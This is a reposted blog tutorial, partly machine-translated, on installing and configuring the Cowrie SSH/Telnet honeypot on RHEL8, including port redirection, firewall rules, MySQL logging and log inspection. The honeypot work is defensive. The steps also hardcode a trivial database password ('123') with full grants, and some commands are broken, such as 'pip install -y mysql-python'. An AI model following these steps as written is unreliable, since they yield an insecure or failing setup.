RHEL8 deploys ssh honeypot

Mobile 2023-09-15 20:41:11 views: null

RHEL8 deploys ssh honeypot

Honeypot cowrie introduction

Project address: https://github.com/cowrie/cowrie

Cowrie is a moderately interactive sshhoneypot Telnetthat can obtain the dictionary used by attackers for brute force cracking, the commands entered, and
the characteristics of malicious files uploaded or downloaded:

  1. 伪装的文件系统Yes 增加/移除文件, the complete file system is available Debian 5.0;
  2. The file content can be added, and the attacker can use the cat command to view such /etc/passwdfiles; the system must contain the minimum file content.
  3. Session logs are recorded in UML-compliant format for easy replay
  4. cowroeSave the file for downloading wget/curl, or for subsequent review—upload using sftpandscp

Install and run cowrie

http://localnetwork.cn/project-3/doc-47/


Install dependency packages

# 安装依赖包
yum install -y git gcc bzip2-devel libffi-devel vim net-tools

Create cowrie user

# 创建cowrie用户
useradd cowrie

Download cowrie source code

# 进入/opt目录
cd /opt

# 下载cowrie源码
git clone https://github.com/cowrie/cowrie.git

# 进入cowrie源码目录
cd /opt/cowrie/

Create a Python3 virtual environment

needpython3.7及以上

# RHEL安装virtualenv包
yum install -y python3-virtualenv

# pip安装virtualenv
pip3 install virtualenv

# 进入cowrie目录
cd /opt/cowrie/

# 创建虚拟环境
python3 -m venv cowrie-env

# 激活虚拟python环境
source cowrie-env/bin/activate

pip installs dependency packages

Above and below (cowrie-env)Python .3.7+虚拟环境执行

# 进入cowrie源码目录
cd /opt/cowrie/

# 升级pip包管理器
pip3 install -U setuptools
pip3 install -U pip

# pip安装依赖包
pip3 install six packaging appdirs

# 安装项目python依赖
pip3 install -U -r requirements.txt

Modify configuration file

# 进入配置模板目录
cd /opt/cowrie/etc/

# 复制配置文件
cp cowrie.cfg.dist cowrie.cfg

# 修改目录的属主
chown -R cowrie /opt/cowrie/

Create a simulated SSH account password leak file

# 编辑模拟SSH账号密码泄露文件
vim etc/userdb.txt

Write down the root passwords that you suspect are leaked. Only these root passwords can log in to our SSH honeypot.

root:x:怀疑泄露密码1
root:x:怀疑泄露密码2
admin:x:怀疑泄露密码3

Configuration file

Modify configuration file
vim cowrie.cfg

Cowrie will listen to SSH port 2222 and Telnet port 2223.
So here the requests connected to ports 22 and 23 are redirected to 2222 and 2223

[telnet]
enabled = true

listen_port = 2223
listen_endpoints = tcp:2223:interface=0.0.0.0

Insert image description here


Configure firewall


firewalld firewall configuration

# 放行ssh蜜罐的2222端口和2223端口
firewall-cmd --add-port=2222/tcp --permanent
firewall-cmd --add-port=2223/tcp --permanent

# 允许SNAT(源地址转换)
firewall-cmd --zone=public --add-masquerade --permanent

# 将22端口转发到2222端口
firewall-cmd --zone=public --add-forward-port=port=22:proto=tcp:toport=2222 --permanent

# 将23端口转发到2223端口
firewall-cmd --zone=public --add-forward-port=port=23:proto=tcp:toport=2223 --permanent

# 更新防火墙规则
firewall-cmd --reload

# 重启sshd服务
systemctl restart sshd

iptables firewall configuration

# 允许从客户端发起的新TCP连接请求通过端口80进入系统
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -j ACCEPT

# 允许从客户端发起的新TCP连接请求通过端口22进入系统
iptables -I INPUT -p tcp --dport 22 -m state --state NEW -j ACCEPT

# 将tcp的22端口重定向到2222蜜罐端口
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

# 将tcp的23端口重定向到2223蜜罐端口
iptables -t nat -A PREROUTING -p tcp --dport 23 -j REDIRECT --to-port 2223

Send Cowrie output to MySQL database –非必需

https://cowrie.readthedocs.io/en/latest/sql/README.html
前置 Conditions:已有Mysql服务器


Install mysql client

Install MariaDB
install mysql server

# 安装mysql客户端
yum install -y mysql-devel

In (cowrie-env)the Python virtual environment 执行.

# 安装mysql-python依赖
pip install -y mysql-python

Create database

-- 创建cowrie库
create database cowrie;

-- 授权"cowrie"从"localhost"访问"cowrie"数据库,可执行所有权限,同时设置改用户的密码为"123"。
grant all on cowrie.* to cowrie@localhost identified by '123';

Import into database

# 进入cowrie的sql目录
cd /opt/cowrie/docs/sql

Import into database

-- 登录数据库
mysql -ucowrie -p

-- 进入到cowrie库
use cowrie;

-- 导入sql
source mysql.sql

Configure honeypot database connection

vim /opt/cowrie/etc/cowrie.cfg

[output_mysql]
enabled = true
host = localhost
database = cowrie
username = cowrie
password = 123
port = 3306

Start honeypot

# 切换到cowrie用户
su - cowrie

# 激活虚拟python环境
source cowrie-env/bin/activate

# 切换目录
cd /opt/cowrie/bin

# 启动蜜罐
/opt/cowrie/bin/cowrie start

# 查看蜜罐状态
/opt/cowrie/bin/cowrie status

# 停止蜜罐服务
/opt/cowrie/bin/cowrie stop

View attacker information and attack methods

# 查看攻击者的攻击信息和攻击方式
mysql -ucowrie -p

View log

tail ./var/log/cowrie/cowrie.log

# 查看json日志
tail ./var/log/cowrie/cowrie.json

# 登录失败
cat ./var/log/cowrie/cowrie.json | grep cowrie.login.failed

# 登录成功
cat ./var/log/cowrie/cowrie.json | grep cowrie.login.success

# 登陆蜜罐后.命令.输入
cat ./var/log/cowrie/cowrie.json | grep cowrie.command.input

Guess you like

Origin blog.csdn.net/omaidb/article/details/132063792
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com